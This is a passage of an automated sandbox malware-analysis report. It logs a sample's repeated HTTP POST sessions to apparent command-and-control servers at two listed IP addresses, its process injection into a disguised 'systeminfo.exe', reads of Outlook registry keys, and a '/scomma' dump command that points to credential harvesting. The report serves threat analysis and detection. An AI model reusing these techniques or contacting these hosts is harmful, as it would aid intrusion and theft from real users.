Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #13
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #14
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #15
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #16
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #17
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #18
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #19
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #20
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 159.203.94.198
Server Port 8080
Data Sent 0.33 KB (335 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 159.203.94.198, server_port = 8080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 159.203.94.198 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 1
Fn
HTTP Session #21
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
Process #9: systeminfo.exe
(Host: 48, Network: 0)
+
Information Value
ID #9
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:08, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
+
Information Value
PID 0x674
Parent PID 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9E4
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False
locale.nls 0x00110000 0x00176fff Memory Mapped File Readable False False False
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x00418fff Private Memory Readable, Writable, Executable True False False
private_0x0000000000590000 0x00590000 0x0060ffff Private Memory Readable, Writable True False False
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False
private_0x0000000000880000 0x00880000 0x009fffff Private Memory Readable, Writable True False False
pagefile_0x0000000000a00000 0x00a00000 0x00b87fff Pagefile Backed Memory Readable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c00000 0x00c00000 0x00d80fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000d90000 0x00d90000 0x0218ffff Pagefile Backed Memory Readable True False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x884 address = 0x400000, size = 102400 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x884 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x884 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x884 os_tid = 0x9e4, address = 0x0 True 1
Fn
Host Behavior
File (3)
+
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (3)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = DLLPathEx, data = 67 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = MSIApplicationLCID, data = 77 True 1
Fn
Module (40)
+
Operation Module Additional Information Success Count Logfile
Load advapi32.dll base_address = 0x756e0000 True 1
Fn
Load ole32.dll base_address = 0x75450000 True 1
Fn
Load shell32.dll base_address = 0x75c50000 True 1
Fn
Load C:\Program Files\Microsoft Office\Root\Office16\OLMAPI32.DLL base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x759f0000 True 1
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75a04f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75a0359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75a01252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75a04208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75a04d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x75a8410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x75a84195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75a0d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75a1ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x772b441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x772dc50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x772dc381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75a1f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x772c05d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x772dca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77290b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7734fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x772e1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x75a84761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x75a7cd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x75a8424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x75a846b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x75a96676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x75a84751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x75a965f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x75a847c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x75a847e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x75a847f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75a1eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
System (1)
+
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-11-28 18:18:50 (UTC) True 1
Fn
Environment (1)
+
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #10: systeminfo.exe
(Host: 792, Network: 0)
+
Information Value
ID #10
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
